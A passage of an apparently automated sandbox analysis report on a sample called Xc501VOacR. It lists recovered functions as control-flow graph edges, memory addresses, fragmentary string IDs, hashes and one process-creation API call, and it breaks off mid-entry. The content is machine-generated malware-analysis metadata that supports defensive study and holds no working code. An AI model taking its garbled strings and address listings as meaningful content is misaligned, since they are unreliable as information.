145->149 180 8230e76-8230e91 148->180 151 8230d13-8230d15 149->151 152 8230d17-8230d27 151->152 153 8230d29-8230d2b 151->153 152->153 161 8230d12 152->161 156 8230d3a-8230d43 153->156 157 8230d2d-8230d37 153->157 161->151 183 8230e93-8230eb2 180->183 184 8230eb4-8230ec7 183->184 185 8230eca-8230ed0 183->185 186 8230ed2-8230ed9 185->186 187 8230f4a-8230fa2 185->187 188 8230fa9-8231001 186->188 189 8230edf-8230ee3 186->189 187->188 192 8231008-82310e2 188->192 191 8230ee9-8230eed 189->191 189->192 194 8230ef0-8230efd 191->194 237 82310e4-82310e8 192->237 238 82310eb-823110c 192->238 201 8230f22-8230f2f 194->201 202 8230eff-8230f0f 194->202 209 8230f31-8230f3b 201->209 210 8230f3e-8230f47 201->210 211 8230f11-8230f20 202->211 212 8230eef 202->212 211->201 211->212 212->194 237->238 239 8231168-82311c0 238->239 240 823110e-8231112 238->240 241 82311c7-82312a2 239->241 240->241 242 8231118-823111c 240->242 278 82312a4-82312a9 241->278 279 82312ab-82312c0 241->279 244 823111f-823112c 242->244 248 8231140-823114d 244->248 249 823112e-823113e 244->249 257 823114f-8231159 248->257 258 823115c-8231165 248->258 249->248 256 823111e 249->256 256->244 278->279 281 82312c2-82312c8 279->281 282 82312d8-82312d9 279->282 283 82312ca 281->283 284 82312cc-82312ce 281->284 283->282 284->282
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707451290.0000000008230000.00000040.00000800.00020000.00000000.sdmp, Offset: 08230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8230000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: (aq$Haq$Haq$Haq$Haq$Haq$Haq$PH]q
                                • API String ID: 0-1363861295
                                • Opcode ID: 251de6848d4a536badf8f2d1eba49d527b4122fe75c7e4afdff6e216cd471207
                                • Instruction ID: 14e87c31b0a9499a787c27f6b3b9f59452f28b0297d15bf2401574a8eef5a769
                                • Opcode Fuzzy Hash: 251de6848d4a536badf8f2d1eba49d527b4122fe75c7e4afdff6e216cd471207
                                • Instruction Fuzzy Hash: F472D1717102258FCB58DB78C8A476E7BA7EF84711F1485AAD506CB3A5CE34DC06CBA1
                                Function 0747401E Relevance: 6.8, Strings: 3, Instructions: 3072COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 518 747401e-74740cc 521 74741d4-74741d6 518->521 522 74740d2-74741cc 518->522 523 74741dd-74741ed 521->523 524 74741d8-74741db 521->524 522->521 528 7474202-7474218 523->528 529 74741ef-7474200 523->529 525 747421b-747565a 524->525 787 7475660-74756e8 525->787 788 747730b-7477366 525->788 528->525 529->525 1121 74756ee call 74782a0 787->1121 1122 74756ee call 74782b0 787->1122 794 74773a8-74773ef 788->794 795 7477368-74773a6 788->795 798 74773f0-747741d 794->798 795->794 802 747741f-7477454 798->802 803 7477456-7477459 802->803 804 7477484-7477498 802->804 806 7477474-7477482 803->806 807 747745b-7477470 803->807 808 74774f5-7477528 804->808 809 747749a-747749e 804->809 806->804 807->806 811 74756f1-74758e4 835 74759de-7475acc 811->835 836 74758ea-74759d9 811->836 857 7475acf-7476f9f 835->857 836->857 857->788 1121->811 1122->811
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$G
                                • API String ID: 0-3628805992
                                • Opcode ID: 478dea73a1b27b54b6a154211ae85133e51d72e178f42b3c4cad7974e1ce053b
                                • Instruction ID: 66915899b335b66f931212f7979b6e5d4e071699803f859248526dc471d4a446
                                • Opcode Fuzzy Hash: 478dea73a1b27b54b6a154211ae85133e51d72e178f42b3c4cad7974e1ce053b
                                • Instruction Fuzzy Hash: 3B537AB0A152598FCB55FF78DC8969CBBB2EB85304F8084E9D448B7340DE386D85CB66
                                Function 08254535 Relevance: 5.5, Instructions: 5513COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1418 8254535-8254559 1419 8254563-8254797 1418->1419 1420 825455c-825455e 1418->1420 1448 82567fd-8256aab 1419->1448 1449 825479d-82554b0 1419->1449 1420->1419 1516 8256ab1-8257988 1448->1516 1517 8257990-825892a 1448->1517 1848 82554b6-8255828 1449->1848 1849 8255830-82567f5 1449->1849 1516->1517 2078 8258cb0-8258cc3 1517->2078 2079 8258930-8258ca8 1517->2079 1848->1849 1849->1448 2083 8259305-825a197 2078->2083 2084 8258cc9-82592fd 2078->2084 2079->2078 2467 825a197 call 825bc1d 2083->2467 2468 825a197 call 825bc2c 2083->2468 2084->2083 2465 825a19d-825a1a4 2467->2465 2468->2465
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dae85729a9e9e2d0493759d14bc5347482b9a09561998bafd8d34576f325e9ca
                                • Instruction ID: 3370997292b506d32d168f854886c4fd785cbd72bb92cce73ea8978dcab971c5
                                • Opcode Fuzzy Hash: dae85729a9e9e2d0493759d14bc5347482b9a09561998bafd8d34576f325e9ca
                                • Instruction Fuzzy Hash: 61B31570A116298FCB58EF38ED896ACBBB2FB89305F4049ADD049A7354DB345D85CF42
                                Function 08254560 Relevance: 5.5, Instructions: 5499COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2469 8254560-8254797 2498 82567fd-8256aab 2469->2498 2499 825479d-82554b0 2469->2499 2566 8256ab1-8257988 2498->2566 2567 8257990-825892a 2498->2567 2898 82554b6-8255828 2499->2898 2899 8255830-82567f5 2499->2899 2566->2567 3128 8258cb0-8258cc3 2567->3128 3129 8258930-8258ca8 2567->3129 2898->2899 2899->2498 3133 8259305-825a197 3128->3133 3134 8258cc9-82592fd 3128->3134 3129->3128 3517 825a197 call 825bc1d 3133->3517 3518 825a197 call 825bc2c 3133->3518 3134->3133 3515 825a19d-825a1a4 3517->3515 3518->3515
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d73fcc4328579f95d3cf612ba4e8351b0fc0f8fd18f0bafb2e048689ac441023
                                • Instruction ID: d90c555834399f1512883a18404274a83fc3a23949392a6ac0fda4fc2121528b
                                • Opcode Fuzzy Hash: d73fcc4328579f95d3cf612ba4e8351b0fc0f8fd18f0bafb2e048689ac441023
                                • Instruction Fuzzy Hash: 2DB31570A116298FCB58EF38ED896ACBBB2FB89305F4049ADD049A7354DB345D85CF42
                                Function 02CD84D8 Relevance: 5.3, Strings: 4, Instructions: 330COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 3519 2cd84d8-2cd84fb 3520 2cd84fd-2cd8503 3519->3520 3521 2cd8506-2cd8526 3519->3521 3520->3521 3524 2cd852d-2cd8534 3521->3524 3525 2cd8528 3521->3525 3527 2cd8536-2cd8541 3524->3527 3526 2cd88bc-2cd88c5 3525->3526 3528 2cd88cd-2cd88de 3527->3528 3529 2cd8547-2cd855a 3527->3529 3532 2cd855c-2cd856a 3529->3532 3533 2cd8570-2cd858b 3529->3533 3532->3533 3536 2cd8844-2cd884b 3532->3536 3537 2cd858d-2cd8593 3533->3537 3538 2cd85af-2cd85b2 3533->3538 3536->3526 3541 2cd884d-2cd884f 3536->3541 3539 2cd859c-2cd859f 3537->3539 3540 2cd8595 3537->3540 3542 2cd870c-2cd8712 3538->3542 3543 2cd85b8-2cd85bb 3538->3543 3545 2cd85d2-2cd85d8 3539->3545 3546 2cd85a1-2cd85a4 3539->3546 3540->3539 3540->3542 3544 2cd87fe-2cd8801 3540->3544 3540->3545 3547 2cd885e-2cd8864 3541->3547 3548 2cd8851-2cd8856 3541->3548 3542->3544 3549 2cd8718-2cd871d 3542->3549 3543->3542 3550 2cd85c1-2cd85c7 3543->3550 3555 2cd88c8 3544->3555 3556 2cd8807-2cd880d 3544->3556 3557 2cd85de-2cd85e0 3545->3557 3558 2cd85da-2cd85dc 3545->3558 3551 2cd863e-2cd8644 3546->3551 3552 2cd85aa 3546->3552 3547->3528 3553 2cd8866-2cd886b 3547->3553 3548->3547 3549->3544 3550->3542 3554 2cd85cd 3550->3554 3551->3544 3561 2cd864a-2cd8650 3551->3561 3552->3544 3559 2cd886d-2cd8872 3553->3559 3560 2cd88b0-2cd88b3 3553->3560 3554->3544 3555->3528 3562 2cd880f-2cd8817 3556->3562 3563 2cd8832-2cd8836 3556->3563 3564 2cd85ea-2cd85f3 3557->3564 3558->3564 3559->3555 3570 2cd8874 3559->3570 3560->3555 3569 2cd88b5-2cd88ba 3560->3569 3571 2cd8656-2cd8658 3561->3571 3572 2cd8652-2cd8654 3561->3572 3562->3528 3565 2cd881d-2cd882c 3562->3565 3563->3536 3568 2cd8838-2cd883e 3563->3568 3566 2cd85f5-2cd8600 3564->3566 3567 2cd8606-2cd862e 3564->3567 3565->3533 3565->3563 3566->3544 3566->3567 3592 2cd8634-2cd8639 3567->3592 3593 2cd8722-2cd8758 3567->3593 3568->3527 3568->3536 3569->3526 3569->3541 3574 2cd887b-2cd8880 3570->3574 3573 2cd8662-2cd8679 3571->3573 3572->3573 3585 2cd867b-2cd8694 3573->3585 3586 2cd86a4-2cd86cb 3573->3586 3578 2cd88a2-2cd88a4 3574->3578 3579 2cd8882-2cd8884 3574->3579 3578->3555 3583 2cd88a6-2cd88a9 3578->3583 3580 2cd8886-2cd888b 3579->3580 3581 2cd8893-2cd8899 3579->3581 3580->3581 3581->3528 3584 2cd889b-2cd88a0 3581->3584 3583->3560 3584->3578 3588 2cd8876-2cd8879 3584->3588 3585->3593 3597 2cd869a-2cd869f 3585->3597 3586->3555 3596 2cd86d1-2cd86d4 3586->3596 3588->3555 3588->3574 3592->3593 3600 2cd875a-2cd875e 3593->3600 3601 2cd8765-2cd876d 3593->3601 3596->3555 3599 2cd86da-2cd8703 3596->3599 3597->3593 3599->3593 3616 2cd8705-2cd870a 3599->3616 3603 2cd877d-2cd8781 3600->3603 3604 2cd8760-2cd8763 3600->3604 3601->3555 3602 2cd8773-2cd8778 3601->3602 3602->3544 3606 2cd87a0-2cd87a4 3603->3606 3607 2cd8783-2cd8789 3603->3607 3604->3601 3604->3603 3609 2cd87ae-2cd87cd call 2cd8ab0 3606->3609 3610 2cd87a6-2cd87ac 3606->3610 3607->3606 3608 2cd878b-2cd8793 3607->3608 3608->3555 3612 2cd8799-2cd879e 3608->3612 3613 2cd87d3-2cd87d7 3609->3613 3610->3609 3610->3613 3612->3544 3613->3544 3614 2cd87d9-2cd87f5 3613->3614 3614->3544 3616->3593
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: (o]q$(o]q$,aq$,aq
                                • API String ID: 0-1947289240
                                • Opcode ID: d96f2e2b9b1de17b1885b6df4dfdac5a56bad3608dd482e0d52ed4950ce4d0da
                                • Instruction ID: d04a22c414496238c8da1e1683c58561943ac68a0594e7902526a02336fe3ee9
                                • Opcode Fuzzy Hash: d96f2e2b9b1de17b1885b6df4dfdac5a56bad3608dd482e0d52ed4950ce4d0da
                                • Instruction Fuzzy Hash: 0BD14D71A00109DFDB14CFA9D884AADBBF6FF88344F558269E505AB2A4DB30ED42CF50
                                Function 08234A58 Relevance: 5.2, Instructions: 5237COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 4576 8234a58-823611a 5530 823611c call 823ae50 4576->5530 5531 823611c call 823ad4f 4576->5531 4830 8236122-823a216 call 823bda9 5529 823a21c-823a223 4830->5529 5530->4830 5531->4830
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707451290.0000000008230000.00000040.00000800.00020000.00000000.sdmp, Offset: 08230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8230000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5adab0d22def2ed01c7c92266007b3d972d042ca438f55658f785d55b6f1c08d
                                • Instruction ID: 8c45ae3ddcd08c5b49032bdefe848e5173dabd36e89e769398fc8048d7fcd987
                                • Opcode Fuzzy Hash: 5adab0d22def2ed01c7c92266007b3d972d042ca438f55658f785d55b6f1c08d
                                • Instruction Fuzzy Hash: 6DB30970A516298FCB58FF38E9986ACBBB2FB84300F4085ADD489A7355DF305D858F85
                                Function 078CC1D8 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 5533 78cc1d8-78cc1fd 5534 78cc1ff 5533->5534 5535 78cc204-78cc228 5533->5535 5534->5535 5536 78cc229 5535->5536 5537 78cc230-78cc24c 5536->5537 5538 78cc24e 5537->5538 5539 78cc255-78cc256 5537->5539 5538->5536 5538->5539 5540 78cc46d-78cc476 5538->5540 5541 78cc3ae-78cc3b1 5538->5541 5542 78cc2ee-78cc306 5538->5542 5543 78cc2a8-78cc2b0 5538->5543 5544 78cc34a-78cc37d call 78ca518 5538->5544 5545 78cc385 5538->5545 5546 78cc281-78cc292 5538->5546 5547 78cc41b-78cc44e call 78c5b68 5538->5547 5548 78cc25b-78cc27f 5538->5548 5549 78cc47b-78cc484 5538->5549 5550 78cc456-78cc468 5538->5550 5551 78cc3d0-78cc3e8 5538->5551 5552 78cc332-78cc345 5538->5552 5539->5549 5540->5537 5561 78cc3ba-78cc3cb 5541->5561 5567 78cc308-78cc317 5542->5567 5568 78cc319-78cc320 5542->5568 5555 78cc2b7-78cc2c2 5543->5555 5544->5545 5559 78cc38e-78cc3a9 5545->5559 5571 78cc294-78cc2a6 5546->5571 5572 78cc2b2-78cc2b4 5546->5572 5547->5550 5548->5537 5550->5537 5569 78cc3ea-78cc3f9 5551->5569 5570 78cc3fb-78cc402 5551->5570 5552->5537 5557 78cc2c4-78cc2d3 5555->5557 5558 78cc2d5-78cc2dc 5555->5558 5566 78cc2e3-78cc2e9 5557->5566 5558->5566 5559->5537 5561->5537 5566->5537 5574 78cc327-78cc32d 5567->5574 5568->5574 5575 78cc409-78cc416 5569->5575 5570->5575 5571->5537 5572->5555 5574->5537 5575->5537
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: e\1$e\1$"*p$"*p
                                • API String ID: 0-1513742261
                                • Opcode ID: 16d08c67cb5ba7ecf025ab01762e3236b2f3e050cc4f2ff3315dec6c5590bc20
                                • Instruction ID: 44e72ce8f66074b3d62e0af7c36132cd1a8ab3bac3ad0288176af65dc0d5cb9a
                                • Opcode Fuzzy Hash: 16d08c67cb5ba7ecf025ab01762e3236b2f3e050cc4f2ff3315dec6c5590bc20
                                • Instruction Fuzzy Hash: FA81F1B0D112198FCB14CFE5D9446EEFBB2AF99300F24942ED41ABB254DB349A42CF64
                                Function 078C4B50 Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6f$6f$$]q
                                • API String ID: 0-3010377955
                                • Opcode ID: be9712c038a5f94661b3eb5ed866fd933ed5b9346e21d5bd0d80dbf6f1c98068
                                • Instruction ID: 1af214f92a515034c4761c3d9a360ff790d5d78d822cf92d09ab7ddb9421812f
                                • Opcode Fuzzy Hash: be9712c038a5f94661b3eb5ed866fd933ed5b9346e21d5bd0d80dbf6f1c98068
                                • Instruction Fuzzy Hash: 8E71D1B4E002099FDB44DFA5E59859EBFB2FF88301F20852ED80AAB355DB349981CF51
                                Function 02CD7D70 Relevance: 3.0, Strings: 2, Instructions: 450COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: (o]q$Haq
                                • API String ID: 0-903699183
                                • Opcode ID: 829faa9c9fba6a01417d01d5e83ace3ac74525b458c324f2cf96c8e16799eebd
                                • Instruction ID: 1e97e97a4b562cc76ed3cdba54b23c428943bab6bb40e3410ec4415b8be6d8f8
                                • Opcode Fuzzy Hash: 829faa9c9fba6a01417d01d5e83ace3ac74525b458c324f2cf96c8e16799eebd
                                • Instruction Fuzzy Hash: 28025A70A002198FDB14DF69C894BAEBBF6BF88300F248569E945DB395DF349D46CB90
                                Function 02CD1B08 Relevance: 2.9, Strings: 2, Instructions: 354COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: Xaq$$]q
                                • API String ID: 0-1280934391
                                • Opcode ID: cbfb4e56de887ebf22d7a554961ecdfb2ebc3ccc0e464e47b60f66786c511f88
                                • Instruction ID: 3b5629943134463ac2d905300a323e22cf208e4168b9a7207add535a17a1d356
                                • Opcode Fuzzy Hash: cbfb4e56de887ebf22d7a554961ecdfb2ebc3ccc0e464e47b60f66786c511f88
                                • Instruction Fuzzy Hash: 2BB1D531F002599BDB08AB7A985863E7BE7BFC4750B088D6DE50AD7384DE79D802C791
                                Function 0747CEF8 Relevance: 2.7, Strings: 2, Instructions: 215COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: Te]q$Te]q
                                • API String ID: 0-3320153681
                                • Opcode ID: d017f902edb11ea568b540aeed6a821f7e9b8d5ffbdeb4009c95b365287c2c90
                                • Instruction ID: 34b96a444a01356ca0dd21eba86bc0708604c0b1144ba3450c3ee99a2ff317c2
                                • Opcode Fuzzy Hash: d017f902edb11ea568b540aeed6a821f7e9b8d5ffbdeb4009c95b365287c2c90
                                • Instruction Fuzzy Hash: 6391C2B4E142498FDB08CFA9C9949DEFBB2BF89300F24942AD415AB265D7349946CF60
                                Function 0747CF08 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: Te]q$Te]q
                                • API String ID: 0-3320153681
                                • Opcode ID: cb33bd8c040a6ca57ea70007aebfd79fe5b4bd06910608c2b8389b0120f1dc9e
                                • Instruction ID: 404306aabb262194e9d2dc98f72cee361aa2088aa02186503e208bd3b0bd93f4
                                • Opcode Fuzzy Hash: cb33bd8c040a6ca57ea70007aebfd79fe5b4bd06910608c2b8389b0120f1dc9e
                                • Instruction Fuzzy Hash: B69192B4E142098FDB08CFAAC9949DEFBB2FF89300F24942AD415BB254DB349946CF54
                                Function 078C4B4A Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6f$$]q
                                • API String ID: 0-403443862
                                • Opcode ID: b346194e6293e0f337b5ad7cf38d58ab5e25f14230169d72d013b28430c7b9a3
                                • Instruction ID: ea422df5b24979f40b0d79566c8d5eb45a2d4629a6bce2b73d242c8f20bdf10a
                                • Opcode Fuzzy Hash: b346194e6293e0f337b5ad7cf38d58ab5e25f14230169d72d013b28430c7b9a3
                                • Instruction Fuzzy Hash: 0971E1B4E002089FDB48DFA5E59859EBFB2FF99301F20852ED80AA7355DB349981CF51
                                Function 078CBC58 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 078CBDC3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID: CreateProcessUser
                                • String ID:
                                • API String ID: 2217836671-0
                                • Opcode ID: e41c0fd7d6db4b025bd3cc50234bdc2aa4d8c66cd5c8d4f1d42c1d4751bb90a5
                                • Instruction ID: 9281ed4ee8d648b85298a5cd6d371e69918d35301232a595e0cfd5c9219cfeb8
                                • Opcode Fuzzy Hash: e41c0fd7d6db4b025bd3cc50234bdc2aa4d8c66cd5c8d4f1d42c1d4751bb90a5
                                • Instruction Fuzzy Hash: 96512BB190021ADFCF24CF59C844BDDBBB5BF48300F0480AAE908B7250DB759A85CF90
                                Function 0747EFF8 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: kQD
                                • API String ID: 0-3066535408
                                • Opcode ID: 0b8e18360bed80793981b00191b7b4fc5ad4e508d222ad87ed63f9244a8ad402
                                • Instruction ID: ba36fe79d935ac089e459da264362ab157df5719e3cae5519fb3895ba8480cb2
                                • Opcode Fuzzy Hash: 0b8e18360bed80793981b00191b7b4fc5ad4e508d222ad87ed63f9244a8ad402
                                • Instruction Fuzzy Hash: 28C106B4D1520ADFCB04CFA9C5848EEFBB2FF89301B24856AD415AB315D734A986CF94
                                Function 0747D780 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: >NG
                                • API String ID: 0-1926143806
                                • Opcode ID: b4c53d6aec3e10180153acd1da163d7fb86f2c244c21cdd2cf5af18b7e05cdc6
                                • Instruction ID: a02f432e39d03573bd0c62d4ae6628fba3af4c3783522b2e96f429402890b7bf
                                • Opcode Fuzzy Hash: b4c53d6aec3e10180153acd1da163d7fb86f2c244c21cdd2cf5af18b7e05cdc6
                                • Instruction Fuzzy Hash: 6D6118B0E252098FCB08CFA9D9406EEFBF2EF89301F24D56AD419A7255D7348A41CF64
                                Function 07478DB8 Relevance: 1.4, Instructions: 1392COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c0a3d359b09e9e9fa4d9a74b98a118cfbc836cd4ca9f94159ce267301563b6f6
                                • Instruction ID: cc1ccf1cd62296319bedc922abe1069d0d228550e802f3e3a32528ec6ad03b47
                                • Opcode Fuzzy Hash: c0a3d359b09e9e9fa4d9a74b98a118cfbc836cd4ca9f94159ce267301563b6f6
                                • Instruction Fuzzy Hash: AFC28C70A142298FC755FF78DC8979DBBB2BB88304F8089A9D44DA7344DE385D85CB92
                                Function 0747AE52 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: <
                                • API String ID: 0-4251816714
                                • Opcode ID: 4c45ea54a0cd17adbaee3579a9c1bbcbd2e8dca07539d0ff0db1977a1ab603c1
                                • Instruction ID: 61a1d7beb1f8872204b1c660482b7ebb18d9ff37b6f71512ae5d7d9750959a85
                                • Opcode Fuzzy Hash: 4c45ea54a0cd17adbaee3579a9c1bbcbd2e8dca07539d0ff0db1977a1ab603c1
                                • Instruction Fuzzy Hash: C75192B5E01658CFDB59CFAAC9446DDBBF2AFC9305F14C0AAD409AB264DB345A85CF00
                                Function 07E44C78 Relevance: .6, Instructions: 596COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2706427139.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e40000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c07ef183b6d1a1f20d27d8f3794225557eb9846e07f522e15e76c133f000b8e6
                                • Instruction ID: 4d750720d5bcb5e8767fdc8fa06e29001fa40f34dff7d9e4249e23e6591963de
                                • Opcode Fuzzy Hash: c07ef183b6d1a1f20d27d8f3794225557eb9846e07f522e15e76c133f000b8e6
                                • Instruction Fuzzy Hash: 12526934A003458FDB14DF28C844B99B7B2FF89314F2582E9D5586F3A2DB71A986CF81
                                Function 07E44C68 Relevance: .6, Instructions: 587COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2706427139.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7e40000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3cb001b9d9f684142d228e98935622f4c878911c661848a6923a16f7c84fb940
                                • Instruction ID: 00002d9fea0af357ee921a154ed42f6d3d484bd4d8c807052fad6722151ec1a8
                                • Opcode Fuzzy Hash: 3cb001b9d9f684142d228e98935622f4c878911c661848a6923a16f7c84fb940
                                • Instruction Fuzzy Hash: 1D526B34A003458FDB14DF28C844B99B7B2FF85314F2586E9D5586F3A2DB71A986CF81
                                Function 078C6EB8 Relevance: .3, Instructions: 339COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1290141330581a283a66b789d4f0a7a8bdc74a52a3bdb1fb135bfc4f46b82985
                                • Instruction ID: d46f87c55d6623543f125f6e6abf8382fe38977e874c81b278f0010efefdba80
                                • Opcode Fuzzy Hash: 1290141330581a283a66b789d4f0a7a8bdc74a52a3bdb1fb135bfc4f46b82985
                                • Instruction Fuzzy Hash: C1F108B1A1126A8FCB64CF25C98479DFBB6FF99340F1495EAD40EA7254D7709A81CF00
                                Function 060116A7 Relevance: .2, Instructions: 242COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2704368226.0000000006010000.00000040.00000800.00020000.00000000.sdmp, Offset: 06010000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6010000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 72ef224102975f2bcf84ebfe0f8d45cc128fa7e26d282a727186f8cc29f26e20
                                • Instruction ID: 7db7d95363722a06e25df794561b393a770921bf66ad11d659b8f2e6447e4971
